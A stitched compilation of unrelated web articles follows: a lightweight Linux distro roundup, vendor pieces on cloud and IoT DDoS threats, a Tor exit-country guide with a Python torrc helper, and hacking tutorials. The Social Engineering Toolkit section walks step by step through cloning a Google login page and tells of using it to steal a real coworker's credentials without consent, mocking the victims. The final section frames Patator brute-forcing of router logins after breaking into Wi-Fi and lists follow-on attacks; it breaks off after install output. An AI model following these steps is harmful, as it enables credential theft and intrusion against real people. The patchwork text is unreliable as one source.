Best lightweight Linux distro of 2020

Modern Linux distros are designed to appeal to a large number of users who run modern hardware.

As a result, they have become too bloated for older machines, even if you manually delete files. Without a healthy dollop of system memory and an extra core or two, these distros may not deliver the best performance.

Thankfully, there are many lightweight distros, trimmed and tweaked by expert hands, which can be used to breathe new life into older hardware.

But there’s one caveat to bear in mind when working with lightweight distros – they usually manage to support ancient kit by cutting away just about everything you take for granted, such as wizards and scripts which make everyday tasks easier.

That said, these lightweight distros are fully capable of reviving older hardware and can even function as a replacement of your current operating system, if you’re willing to adjust to their way of working and install extra programs as necessary.

Image credit: Absolute Linux

1. Absolute Linux

A featherweight distro designed for desktop use
  • Easy to configure
  • Highly streamlined and nimble distro
  • Plenty of help documentation on hand

Absolute Linux is a lightweight distro designed for desktop use, and as such comes preinstalled with the Firefox browser and LibreOffice suite. It’s based on Slackware 14.2 but unlike its parent OS, aims to make configuration and maintenance as simple as possible.

New versions of Absolute Linux are released roughly once a year. The most recent version (15.0) was made available for download in February 2018. It’s available as a 2GB ISO for 64-bit computers. The OS is still in the beta testing stage so may perform a little unpredictably, as ever with beta software. Whichever version you choose, there’s a massive selection of lightweight applications available. 

The installer is text-based so there’s no Live mode, but nevertheless it’s incredibly simple to follow. The way Absolute is structured also means that you can add and remove packages from the install media to create a distro which truly suits you, though you’ll need some time and experience with Linux if you really want to make the most of this feature. 

Once installed, Absolute Linux is incredibly nimble. This is ensured through the lightweight IceWM window manager, along with popular apps such as LibreOffice, making this OS perfect for older machines. There’s also plenty of documentation accessible from within the desktop itself to assist new users.

Image credit: TinyCore

2. TinyCore

Tiny by name, and most certainly tiny by nature…
  • Incredibly compact distro
  • Three choices of size
  • It’s unsurprisingly barebones

The Core Project offers up the tiniest of Linux distros, shipping three variants on which you can build your own environments. The lightest edition is Core, weighing in at just 11MB, which comes without a graphical desktop – but you can always add one after installation. 

If that’s too intimidating, try TinyCore (currently v9.0). The OS is only 16MB in size and offers a choice of FLTK or FLWM graphical desktop environments. 

You can also choose to install CorePlus, which measures a relatively hefty 106MB. This spin offers a choice of lightweight window managers such as IceWM and FluxBox. CorePlus also includes support for Wi-Fi and non-US keyboards.  

TinyCore saves on size by requiring a wired network connection during initial setup. The recommended amount of RAM is just 128MB. There are 32-bit and 64-bit versions as well as PiCore, which is a build for ARM devices like the Raspberry Pi.

This minimalist distro doesn’t feature many apps. After installation there’s little beyond the Terminal, a basic text editor and a network connection manager. The Control Panel provides quick access to the different configurable parts of the distro such as display, mouse, network, etc. Use the graphical package manager ‘Apps’ to install additional software such as multimedia codecs.

Image credit: Lubuntu

3. Lubuntu

A neat spin on the popular OS for older machines
  • Ubuntu but slimmed down
  • Uses nifty lightweight apps
  • Compatible with Ubuntu repositories

The ‘L’ in Lubuntu stands for lightweight, and it unashamedly appeals to those Ubuntu users who are looking for an OS which requires fewer resources than most modern distros, but doesn’t force you to compromise on your favourite apps.

Lubuntu is primarily designed for older machines. The default desktop is based on LXQt, which is far less resource hungry than mainstream Ubuntu’s Gnome 3 desktop. It comes with a plethora of office, internet, multimedia and graphics apps, along with a wide assortment of useful tools and utilities. 

As a lightweight distro, Lubuntu focuses on being fast and energy efficient. It features alternative and less resource intensive apps where possible. The most recent releases have also reverted back to using LibreOffice rather than Abiword for word processing.

This doesn’t mean that Lubuntu is lacking, though: it’s based on Linux Kernel 5.00 and Ubuntu 18.04, so it’s a proper modern Linux distro – it’s just shed all unnecessary weight, in the manner of a rally car having all but one of its seats removed.

The most recent release of Lubuntu (19.04 – Disco Dingo) has now lowered the minimum required RAM to run the OS to 500MB. However, to ensure smooth running, try to use a machine with at least 1GB of RAM. It’s available in 32-bit and 64-bit incarnations.

The unique selling point of Lubuntu is its compatibility with Ubuntu repositories, which gives users access to thousands of additional packages that can be easily installed using the Lubuntu Software Center.

Image credit: LXLE

4. LXLE

A lightweight spin on Ubuntu LTS
  • Emphasizes stability and support
  • Good-looking distro
  • Impressive range of apps

LXLE is a lightweight version of Linux based on the annual Ubuntu LTS (long term support) release. Like Lubuntu, LXLE uses the barebones LXDE desktop environment, but as LTS releases are supported for five years, it emphasises stability and long-term hardware support. The most recent version at the time of writing (16.04.4) is a remaster of the current version of Ubuntu LTS.

Aimed primarily at reviving older machines, the distro is designed to serve as a ready to use desktop out of the box, specifically tailored to appeal to existing Windows users.

The developers spend a considerable amount of time making all the necessary mods and tweaks to improve performance, but they don’t skimp on niceties. Aesthetics are a key area of focus as evidenced by the hundred wallpapers which are included, along with clones of Windows functions like Aero Snap and Expose.

The distro boasts full featured apps across categories such as internet, sound and video, graphics, office, games, and more. It also includes plenty of useful accessories such as a Terminal-based Weather app and Penguin Pills, which is a graphical frontend for several virus scanners.

Like Lubuntu, LXLE is available as a Live image for 32-bit and 64-bit machines. The hardware requirements are 512MB of system RAM at a minimum, with 1GB recommended.

Image credit: Damn Small Linux

5. Damn Small Linux

This compact OS will even run on an old 486 PC
  • Only needs 16MB of RAM to run
  • Has lots of pre-installed tools despite size
  • Last stable version is very old

Damn Small Linux (DSL) lives up to its name in that the install image is barely 50MB. It’s designed specifically for x86 PCs and will run on an ancient 486 CPU with 16MB of RAM. This means it can run fully inside your system memory which can result in phenomenally fast speeds. 

DSL is usually run from a USB or CD, or you can do a Debian-style installation to a hard drive if you prefer.

Despite the extremely minimal desktop, you may be surprised at the vast array of tools that come preinstalled. You can surf the web with a choice of three browsers – Dillo, Firefox or the text-based browser Netrik. You can also examine office documents using the Ted word processor and check your email with the minimal Sylpheed client. Or indeed sort through your data with the ultra-tiny emelFM file manager.

The latest stable version of DSL (4.4.10) was released in 2008. However, you can update and add new applications using the MyDSL Extension Tool.

Image credit: Porteus

6. Porteus

Slackware-based distro is incredibly fast and streamlined
  • Can run direct from system RAM
  • Neat choice of desktop environments
  • Can no longer build own custom ISO

This Slackware-based distro is designed to be completely portable and run on removable media such as a USB stick or CD, but can just as easily be installed to a hard disk. The distro is incredibly fast as it’s small enough to run entirely from system RAM. 

The unique selling point of Porteus is that it exists in a compressed state (less than 300MB for the Cinnamon and MATE editions) and creates the file system on-the-fly. Besides the preinstalled apps, all additional software for the distro comes in the form of modules, making the OS very small and compact.

Porteus is available for 32-bit and 64-bit machines. The distro provides users with the choice of KDE, MATE, Cinnamon, Xfce and LXDE desktop environments when downloading the ISO image.

Unfortunately the option to build your own custom ISO has been removed since we previously looked at Porteus, but the pre-built images offer a decent selection of software and drivers, as well as an excellent selection of tutorials to help you get started.

Image credit: Vector Linux

7. Vector Linux

Keeping things simple and small…
  • Highly flexible distro
  • Suitable for home desktop or office server
  • Available in two variants

This distro’s credo is ‘keep it simple, keep it small’, and it manages this to great effect. It allows users to mould the distro to serve just about any possible purpose – Vector Linux can be a lightning-fast desktop for home users, and can just as easily be used for running servers, or as the gateway for your office computer.

After a lengthy period, Vector Linux 7.1 was finally officially released in July 2015, and now comes in two flavours: Light and Standard. The difference is in the desktop environment used. Vector Linux Light uses the ultra-efficient IceWM for the desktop environment while the Standard version is powered by Xfce.

This Slackware-based distro tends to favour GTK+ apps such as Pidgin Messenger, but you can use the TXZ package manager to fetch and install additional software.

Image credit: Puppy Linux

8. Puppy Linux

One of the veterans of the lightweight Linux world
  • Huge range of apps
  • Different versions for differing needs
  • XenialPup edition works with Ubuntu repositories

Puppy Linux is one of the oldest lightweight distros out there. The project has been turning out slim, sleek and fast distros for 15 years now, and offers different versions depending on the underlying environment. Puppy Linux 8.0 (Bionic Pup) is based on Ubuntu Bionic Beaver (18.04).

Puppy Linux developer, Barry Kauler, also manages a sister project named Quirky, a version of Puppy Linux built using the custom tool Woof-CE.

The distro is full of apps, belying its small size – some are quite unconventional, such as Homebank which helps you manage your finances, or Gwhere which is for cataloguing disks. There are also graphical tools to manage Samba shares and set up a firewall, for example. The sheer variety of applications is impressive.

The Bionic Pup edition of Puppy Linux is compatible with Ubuntu’s repositories, giving users access to the parent distro’s vast software collection. The handy QuickPet utility can be used to install some of the most popular apps.

Image credit: Linux Lite

9. Linux Lite

Designed for those who won’t pay for a new version of Windows
  • Aimed at easing migration of Windows users
  • Features a host of familiar apps
  • Not the least demanding distro out there

Linux Lite is based on Ubuntu (currently Long Term Support version 18.04). It is specifically developed to ease Windows users – particularly those with old machines running Windows XP – into the world of Linux.

It features familiar tools like Firefox (with built-in support for Netflix), plus VLC Media Player and LibreOffice are preinstalled. The OS also includes the zRAM memory compression tool which makes it run faster on older machines. There’s also a special ‘Lite Upgrade’ utility.

Despite its name, this distribution isn’t the least resource hungry out there, as it requires both a 1.5GHz processor and at least 1GB of RAM to run smoothly. That said, this shouldn’t be too much to ask of any computer made in the last decade. 

Try it on modern hardware and you’ll be amazed at just how quickly it runs. Linux Lite can boot from a Live medium such as a USB stick or CD, or install to your hard drive. It also supports multi-booting so you can keep your existing OS if you wish. The distro is available for both 32-bit and 64-bit systems.

Image credit: BunsenLabs

10. BunsenLabs

A distro that’s carrying the Crunchbang torch onwards
  • Blazing fast performance
  • Smartly configured Openbox window manager

Crunchbang (or #!) was a very popular Debian-derived distro specifically designed to use as few system resources as possible. While it was discontinued in 2013, the community fondly remembered its lightning speed and responded with two Crunchbang-based distros to continue its legacy.

However, one of those successors, Crunchbang++, has now been discontinued. BunsenLabs is still active, though, and its current release (Helium) is based on the latest stable version of Debian featuring a gorgeously configured Openbox window manager and its own repository of core packages.

There’s also a point release option, which is regularly updated if you want to stay on the bleeding-edge. It requires at least 256MB of RAM to run (with 1GB or more recommended). 


Cloud solutions and mobile workers: Why are mobile workers a cyber threat?

Telework and working from home have been on the rise for more than a decade. According to a Bitkom study, one in three companies now offers its employees the option of working from home, and the trend is rising.

A flexible workplace offers several advantages, but the weak link is cloud security, which can put companies at risk. According to the Netwrix Cloud Data Security Report 2019, 38 percent of companies that employ mobile workers recorded cloud data security breaches. That is twice the figure for more traditional companies that employ only on-site staff.

Who is a mobile worker?

The term mobile worker is not limited to freelancers and contractors. Today, some employees work every day from home or from another location and log in to the corporate network occasionally when needed (for example, during a business trip or on a sick day).

Why do mobile workers pose a cyber threat?

Mobile workers often log in to their corporate network from their own devices, which are highly likely to have security weaknesses. For example, it is hardly or not at all possible to guarantee that these devices are free of malicious software and properly patched. In addition, companies are slower to respond when a mobile user makes a mistake that leads to unauthorised data access or even to data compromise. Such mistakes are too expensive to ignore: the 2019 "Cost of a Data Breach" study conducted by the Ponemon Institute found that 24 percent of all data breaches are due to human error, with the total cost of a data breach amounting to around 120 euros per record. The costs include both direct financial consequences (for example, fines for compliance violations and litigation) and indirect costs caused by reputational damage, such as the loss of customer loyalty and brand value.

How can you minimise these threats?

Properly managing mobile workers is impossible without knowing exactly what they are doing in the company's cloud environment. In particular, deep visibility into user activity and into company data is required.

Visibility into user activity

Knowing who does what, where and when allows suspicious behaviour to be detected quickly. IT security can then respond in time, before a data breach occurs. Incidents can also be investigated thoroughly to ensure that they do not happen again. A further benefit is that proof of compliance with legal requirements can be presented to auditors on request. Many companies still lack sufficient visibility into user activity: 59 percent of the companies surveyed by Netwrix that employ mobile workers were unable to identify the threat actors behind security incidents in the cloud.

With a software solution that offers continuous monitoring of user activity together with real-time alerts, security teams can detect threats immediately, conduct detailed investigations and pass compliance audits.

Visibility into data

With the cloud, sharing data is easier than ever. When it is known exactly which data exists, where it is located, which data is the most sensitive and who has access to it, security measures can concentrate on the most critical or confidential information, such as the personal data of customers and employees. If it is not known where sensitive data resides, it is impossible to protect it using security best practices and in line with legal requirements.

Using a data discovery and classification solution, companies can locate their sensitive data and apply the appropriate controls. Those who classify all their data are five times less likely to experience a data breach than those who do not.

Data discovery and classification also makes it possible to identify redundant, obsolete and trivial (ROT) data. Cleaning it up lowers data management and storage costs and increases productivity, since users can find the information they need more easily.

How can visibility boost the business?

Visibility into their cloud environments also offers companies enormous long-term benefits. First, they can demonstrate their commitment to data protection once they are able to store their customers' personal data securely and respond promptly to requests to be forgotten. The resulting customer loyalty is a clear competitive advantage.

Visibility into data and the associated user activity also makes it possible to minimise the time and resources spent on compliance and to avoid heavy fines. According to a study by Precise Security, the fines paid under the GDPR in 2019 totalled more than 402 million euros, with the highest fine in Germany imposed on Deutsche Wohnen at 14.5 million euros. Companies should therefore ensure that their data in the cloud is correctly classified and protected from unauthorised access at all times.

About the author: Jürgen Venhorst is Country Manager DACH at Netwrix.

Setting a specific country in the Tor Browser

In this tutorial I show you how to set a custom entry and exit country in the Tor Browser for desktop computers. This makes Tor use specific servers in other countries, so that you can get around web restrictions in your own region. Bear in mind that not all countries allow you to use Tor, which means that certain countries will not work as entry and exit options.

Method 1: On Windows

  1. Make sure you have run Tor at least once. For the "torrc" file (the file that determines Tor's exit node preference) to appear, you must have run Tor at least once on your computer.
    • To do so, simply double-click the Tor icon and then click Connect.
  2. Open the Tor folder. Go to the folder where you installed Tor and double-click it to open it.
  3. Find the "torrc" file. Navigate within the Tor installation folder to the location of the "torrc" file as follows:
    • Double-click the Browser folder.
    • Double-click the TorBrowser folder.
    • Double-click the Data folder.
    • Double-click the Tor folder.
  4. Open "torrc" with Notepad. Double-click the "torrc" file, click Notepad in the "Open with" window that appears, and then click Open. This lets you edit the text of the file.
  5. Add the "EntryNodes" line. Place the cursor below the last line of text in the document, then type EntryNodes {} StrictNodes 1 and press ↵ Enter.[1]
  6. Add the "ExitNodes" line. Type ExitNodes {} StrictNodes 1 and press ↵ Enter.
  7. Find the codes for your entry and exit countries. In your computer's browser go to https://web.archive.org/web/20180328074444/http://www.b3rn3d.com/blog/2014/03/05/tor-country-codes, scroll down to the heading "List of country codes for Tor" and look up the codes for the countries you want to use as entry and exit nodes.
    • For example, if you want your Tor session to start in Canada and end in Uganda, you would look up the country codes for "Canada" (ca) and "Uganda" (ug).
  8. Enter the entry and exit country codes. Type the code for the country where your session should start between the {} braces to the right of the "EntryNodes" line, then repeat this for the exit country on the "ExitNodes" line. For example, to start in Canada and end in Uganda, your lines would look like this:
    • EntryNodes {ca} StrictNodes 1
    • ExitNodes {ug} StrictNodes 1
  9. Consider disabling "strict nodes". To do so, replace StrictNodes 1 with StrictNodes 0, which ensures that Tor can still use other country codes if the ones you specified do not work.
  10. Add several country options to a "strict node". If you want to keep strict nodes for your entry and/or exit country, consider adding several country codes instead of just one country. You can add countries by inserting further country codes inside the braces. Separate the individual entries with commas. For example, to add the USA and France to the "ExitNodes" line alongside Uganda, your line would look like this:
    • ExitNodes {ug},{us},{fr} StrictNodes 1
      • Make sure there is no space between the bracketed countries.
  11. Replace the original "torrc" file with the one you have just updated. This ensures that the country settings for your Tor Browser are saved:
    • Click File
    • Click Save As
    • Click the "Save as type" drop-down and then click All Files
    • Click the "torrc" file in the main window to select it
    • Click Save
    • Click Yes
  12. Open Tor. Tor may take slightly longer to start this time, especially if you chose a distant country.
  13. Check the entry and exit nodes of your circuit. In Tor go to any website, for example https://www.google.com/, and then click the onion-shaped icon at the top left of the page. A drop-down menu headed "Tor circuit for this site" appears, showing, from top to bottom, your browser, the entry node, the middle connections, the exit node and the Internet.
    • In the example used in this method you would see: This browser > Canada [IP address] > [country] [IP address] > Uganda [IP address] > Internet.
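The torrc edits in steps 5 to 10, as an added Python helper (example code written for this page, not part of the tutorial or of Tor itself): it validates the two-letter country codes, joins several codes with commas and no spaces, replaces any earlier EntryNodes/ExitNodes/StrictNodes lines instead of appending duplicates, and reads the settings back so you can confirm the file before restarting Tor. Unlike the one-line form typed in steps 5 and 6, it writes StrictNodes on its own line, because Tor reads torrc as one "keyword value" pair per line. The sample torrc, its /PLACEHOLDER path and the function names are constructed for this example.

```python
import re
from typing import Dict, Iterable, List

# Tor expects lower-case two-letter country codes wrapped in braces, e.g. {ca}.
COUNTRY_CODE = re.compile(r"^[a-z]{2}$")

# Constructed sample of an existing Tor Browser torrc (not a real file). It already
# pins an entry country, which the merge step below must replace, not duplicate.
SAMPLE_TORRC = """\
# constructed sample torrc
DataDirectory /PLACEHOLDER/TorBrowser/Data/Tor
ControlPort 9151
EntryNodes {de}
StrictNodes 1
"""


def format_node_option(keyword: str, countries: Iterable[str]) -> str:
    """Build one option line such as 'ExitNodes {ug},{us},{fr}'.

    Codes are trimmed, lower-cased and validated; entries are comma-joined with
    no spaces, which is the form step 10 warns about.
    """
    codes = [c.strip().lower() for c in countries]
    if not codes:
        raise ValueError("at least one country code is required")
    for code in codes:
        if not COUNTRY_CODE.match(code):
            raise ValueError(f"invalid country code: {code!r}")
    return keyword + " " + ",".join("{" + code + "}" for code in codes)


def build_node_lines(entry: Iterable[str], exit_: Iterable[str],
                     strict: bool = True) -> List[str]:
    """Return the three lines to place in torrc, one option per line."""
    return [
        format_node_option("EntryNodes", entry),
        format_node_option("ExitNodes", exit_),
        "StrictNodes %d" % (1 if strict else 0),
    ]


def merge_into_torrc(existing: str, node_lines: Iterable[str]) -> str:
    """Drop any earlier EntryNodes/ExitNodes/StrictNodes lines, then append the
    new ones, so re-running the procedure never leaves two competing settings."""
    managed = {"EntryNodes", "ExitNodes", "StrictNodes"}
    kept = [line for line in existing.splitlines()
            if line.split(" ", 1)[0] not in managed]
    return "\n".join(kept + list(node_lines)) + "\n"


def parse_node_settings(torrc_text: str) -> Dict[str, object]:
    """Read the node settings back; comments and unrelated options are ignored."""
    settings: Dict[str, object] = {"EntryNodes": [], "ExitNodes": [], "StrictNodes": 0}
    for raw in torrc_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        keyword, _, value = line.partition(" ")
        if keyword in ("EntryNodes", "ExitNodes"):
            settings[keyword] = re.findall(r"\{([a-z]{2})\}", value)
        elif keyword == "StrictNodes":
            settings["StrictNodes"] = int(value.strip())
    return settings


if __name__ == "__main__":
    # Canada in, Uganda/USA/France out, as in steps 8 and 10.
    new_lines = build_node_lines(["ca"], ["ug", "us", "fr"], strict=True)
    updated = merge_into_torrc(SAMPLE_TORRC, new_lines)
    print(updated)
    print(parse_node_settings(updated))
```

Run it to print the merged file; in practice you would write that result over the torrc file located in step 3 and then restart Tor Browser (step 12). Keeping StrictNodes 0 (step 9) remains the safer choice when a pinned country has few relays, since with StrictNodes 1 Tor refuses to build a circuit at all if no matching relay is usable.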

DDoS attacks from the Internet of Things: IoT as a land of plenty for cybercriminals

The presence of IoT devices on the Internet continues to grow at a rapid pace, much to the delight of organised cybercrime, which sees the expected 20.4 billion devices projected to be connected to the Internet by the end of 2020 as a cash cow served up on a silver platter.

It is not only the privately used smart watches, tablets, home automation devices, smart toys and cars, deployed by the million worldwide, whose security functions are often still immature. In many industries, too, business models are now hardly conceivable without the Internet of Things.

For botnet operators this opens up a rich supply of systems suited to contributing their share to the next DDoS attack. Cybercrime is mainstream today: students can rent botnets to take down test platforms. Nation states use digital weapons in geopolitical conflicts. Highly trained groups operate jointly across national borders and pursue nothing but profit maximisation in their data thefts and DoS attacks.

The scale of the threat becomes clear when you open the "Threat Intelligence Report" for the second half of 2019 published by Netscout. The security specialists have been monitoring the development of attacks on digital infrastructures since 2007; their Active Threat Level Analysis System (ATLAS) collects, analyses, prioritises and consolidates data from real attacks and attack attempts, based on original research and infrastructure data as well as automated malware analysis pipelines, sinkholes, scanners and honeypots.

Mirai booms along with the IoT

According to the report, a significant increase in IoT-based malware was observed in the second half of 2019, most of it consisting of Mirai variants. Whereas around 35,000 Mirai samples had been identified in 2017, that number had already exceeded 225,000 in 2019, tailored to 17 different system architectures. Successful attacks do not only aim to steal sensitive data; rather, compromised devices are integrated into botnets. The result is more Distributed Denial of Service (DDoS) attacks on services, applications and mobile networks.

In total, around 8.4 million DDoS attacks were recorded in 2019, which is more than 23,000 attacks per day or 16 per minute. In two thirds of cases, companies were the target. Compared with the same period in 2018, the number of attacks in the second half of 2019 rose by a hefty 87 percent, with the largest attack mitigated peaking at 622 Gbit/s.

Mobile network operators in particular experienced a 64 percent increase in DDoS attack frequency in the second half of 2019 compared with the same period in 2018. This was mainly due to the growing tendency to use mobile devices as wireless hotspots. The popularity of gaming on mobile devices with 4G connectivity also contributed to this growth. Satellite telecommunications even saw a 295 percent increase in the number of attacks. Service providers reported a 52 percent increase in DDoS attacks on publicly accessible service infrastructure, up from 38 percent the year before.

DDoS as a service

The marked increase in DDoS attack numbers suggests, among other things, that the DDoS-for-hire business model has become firmly established. DDoS professionals make their expertise available for a fee to anyone who wants to bring down websites their client dislikes. These DDoS service providers have long since left their start-up phase behind and monetise their services so efficiently that it can take just five days before a chosen target comes under sustained fire. Compromised IoT devices have taken on the leading role in generating the necessary number of connection requests. A clear trend is now emerging of attacking IoT devices behind firewalls as well, since these have been recognised as generous bandwidth donors: the number of IoT devices located behind firewalls is 20 times higher than the number directly connected to the Internet.

Through new attack vectors, the abuse of mobile hotspots and the targeted use of compromised IoT devices, attackers are increasingly finding promising ways to do this. Notably, attackers usually use their ammunition sparingly and deploy only a small fraction of the available compromised devices per attack. In the largest attack observed by Netscout, less than one percent of the available reflectors was used. In most other observed cases, too, less than three percent of the resources available in this attack vector were used.

The study also details the continuously rising number of activities by state-sponsored cybercriminals who attack digital targets on behalf of interest groups or governments, with companies, international organisations and NGOs in the crosshairs. The cyber tactics employed range from malware and DDoS attacks to social engineering. The Advanced Persistent Threat (APT) groups carrying them out not only receive their financial backing from the state but can often also draw on cutting-edge technology for their attacks.

About the author: Kirill Kasavchenko is Principal Security Technologist, CTO Office at Netscout.

Security ABC for Windows

Security is not a sledgehammer with which you simply hit the danger over the head. The danger is not one big, single opponent. Rather, security and danger relate to each other like a fishing net of tools and techniques and a swarm of piranhas. Make sure your net is tight enough to catch all threats before they land on your PC.

Kali Linux: Social Engineering Toolkit

Humans are the best resource and end-point of security vulnerabilities ever. Social engineering is a kind of attack that targets human behaviour by manipulating and playing with people's trust, with the aim of gaining confidential information such as banking account details, social media and email credentials, or even access to the target computer. No system is safe, because systems are made by humans. The most common attack vector using social engineering attacks is spreading phishing through email spam. They target victims who have a financial account such as banking or credit card information.

Social engineering attacks do not break into a system directly; instead they use human social interaction, and the attacker deals with the victim directly.

Do you remember Kevin Mitnick? The social engineering legend of the old era. In most of his attack methods he used to trick victims into believing that he held system authority. You might have seen his social engineering attack demo video on YouTube. Take a look at it!

In this post I am going to show you a simple scenario of how to carry out a social engineering attack in daily life. It is so easy; just follow along with the tutorial carefully. I will explain the scenario clearly.

Social Engineering Attack to gain email access

Goal: Gaining email credential account information

Attacker: Me

Target: My friend. (Really? Yes.)

Device: A computer or laptop running Kali Linux, and my mobile phone!

Environment: Office (at work)

Tool: Social Engineering Toolkit (SET)

So, based on the scenario above, you can imagine that we don't even need the victim's device; I used my laptop and my phone. I only need his head and his trust, and his stupidity too! Because, you know, human stupidity cannot be patched, seriously!

In this case we first set up a phishing Gmail account login page on my Kali Linux machine and use my phone as the trigger device. Why did I use my phone? I will explain later.

Fortunately we are not going to install any tools; our Kali Linux machine has SET (Social Engineering Toolkit) pre-installed, and that is all we need. Oh yeah, if you don't know what SET is, I will give you some background on this toolkit.

The Social Engineering Toolkit is designed to perform human-side penetration tests. SET (for short) was developed by the founder of TrustedSec (https://www.trustedsec.com/social-engineer-toolkit-set/); it is written in Python and is open source.

Alright, that was enough; let's get to the practice. Before we conduct the social engineering attack, we need to set up our phishing page first. Here, I am sitting at my desk; my computer (running Kali Linux) is connected to the same Wi-Fi network as my mobile phone (I am using Android).

STEP 1. SET UP THE PHISHING PAGE

Setoolkit uses a command-line interface, so don't expect 'clicky-clicky' things here. Open up a terminal and type:

~# setoolkit

You will see the welcome page at the top and the attack options at the bottom; you should see something like this.

Yes, of course, we are going to perform Social Engineering Attacks, so choose number 1 and hit ENTER.

Then you will be shown the next set of options; choose number 2, Website Attack Vectors. Hit ENTER.

Next, choose number 3, Credential Harvester Attack Method. Hit ENTER.

The further options are narrower. SET has pre-formatted phishing pages for popular websites such as Google, Yahoo, Twitter and Facebook. Now choose number 1, Web Templates.

Because my Kali Linux PC and my mobile phone were on the same Wi-Fi network, just input the attacker's (my PC's) local IP address and hit ENTER.

PS: To check your device's IP address, type 'ifconfig'.

Alright, so far we have set our method and the listener IP address. This menu lists the pre-defined web phishing templates mentioned above. Because we are aiming at the Google account page, choose number 2, Google. Hit ENTER.


Now SET starts the web server on my Kali Linux machine on port 80 with the fake Google account login page. Our setup is done. Now I am ready to walk into my friend's room to log in to this phishing page using my mobile phone.

STEP 2. HUNTING VICTIMS

The reason why I am using a mobile phone (Android)? Let's see how the page is displayed in my built-in Android browser. So, I am accessing my Kali Linux web server at 192.168.43.99 in the browser. And here is the page:

See? It looks so real; there are no security issues displayed on it. The URL bar shows the title instead of the URL itself. We know the stupid will recognize this as the original Google page.

So, I take my mobile phone, walk over to my friend, and talk to him as if I had failed to log in to Google, wondering whether Google crashed or errored. I hand him my phone and ask him to try to log in using his account. He doesn't believe my words and immediately begins typing in his account information as if nothing bad will happen here. Haha.

He has typed in all the required fields and lets me click the Sign in button. I click the button… Now it is loading… And then we get the Google search engine main page, like this.

PS: Once the victim clicks the Sign in button, the authentication information is sent to our listener machine and logged.

Nothing is happening, I tell him; the Sign In button is still there, you failed to log in. Then I open the phishing page again, while another friend of this stupid guy comes over to us. Nah, we got another victim.

Until I cut the talk short and go back to my desk to check the log of my SET. And here is what we got:

Gotcha… I pwned you!!!

In conclusion

I am not good at storytelling (that's the point); to sum up the attack so far, the steps are:

  • Open ‘setoolkit’
  • Choose 1) Social Engineering Attacks
  • Choose 2) Website Attack Vectors
  • Choose 3) Credential Harvester Attack Method
  • Choose 1) Web Templates
  • Input the IP address
  • Choose Google
  • Happy hunting ^_^

Break into Router Gateways with Patator

Router gateways are responsible for protecting every aspect of a network’s configuration. With unfettered access to these privileged configurations, an attacker on a compromised Wi-Fi network can perform a wide variety of advanced attacks.

Brute-Forcing Router Logins with Patator

After hacking a Wi-Fi router with tools like Aircrack, Wifiphisher, and Wifite2, there are several avenues an attacker may explore to further compromise the network. Assuming the gateway isn’t using default credentials, the attacker will try to exploit a vulnerability in the router or perform a brute-force attack.

With access to the router’s gateway and complete control over the configurations, a hacker in this position of power can perform a variety of attacks. They could do any of the following, and then some.

  • perform DNS poisoning attacks
  • modify or manipulate forwarding ports
  • reset the gateway password
  • inject JavaScript into a browser on the network
  • reset the Wi-Fi name and password
  • install a malicious firmware
  • modify or delete login and system logs
  • modify or disable the firewall

Patator, like Hydra and Medusa, is a command-line brute-forcing tool. The developers have tried to make it more reliable and flexible than its predecessors. My favorite feature of Patator is the raw_request module that allows penetration testers to brute-force HTTP logins much like Burp’s Intruder module.

A General Outline for an Attack

To demonstrate, I’m going to show how to use Patator against two popular consumer routers found on Amazon. Not all router gateways handle authentication the same. I’ll show a kind of general procedure to follow when performing such attacks.

  1. Capture a login request: A single login attempt is captured in Burp to analyze the request.
  2. Identify the parameters: It’s important to identify where the dynamic parameters (i.e., username and password) are stored in the request as some login forms handle authentication differently.
  3. Modify and save the request: After the parameters have been identified, insert a placeholder into the request to help Patator iterate through the desired wordlist.
  4. Generate a targeted wordlist: A targeted wordlist containing 10,000 passwords is usually more effective than a wordlist of 10 million random passwords. Some authentication methods involve hashing or encoding the credentials in the client’s browser before making the request. The wordlist will need to reflect this as needed.
  5. Identify and filter failed requests: With modern routers, very rarely will a successful login attempt make itself known. Understanding and filtering HTTP status codes plays a big part in telling a failed login attempt from a successful one.

Now, a word of caution: Patator isn’t very beginner-friendly, so there’s a bit of a learning curve with the syntax that can take some getting used to. Before proceeding, you should have a general understanding of HTTP requests, HTTP status codes, and some experience with Burp’s Intruder module.

Install Patator in Kali Linux

Use the following apt-get command to install Patator in Kali.

~# apt-get update && apt-get install patator

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
  libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
  python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n]

When that’s done, use the --help option to verify that Patator was successfully installed and to view the available modules.

~# patator --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator module --help

Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + ajp_fuzz      : Brute-force AJP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + rdp_login     : Brute-force RDP (NLA)
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward DNS lookup
  + dns_reverse   : Reverse DNS lookup
  + snmp_login    : Brute-force SNMP v1/2/3
  + ike_enum      : Enumerate IKE transforms
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
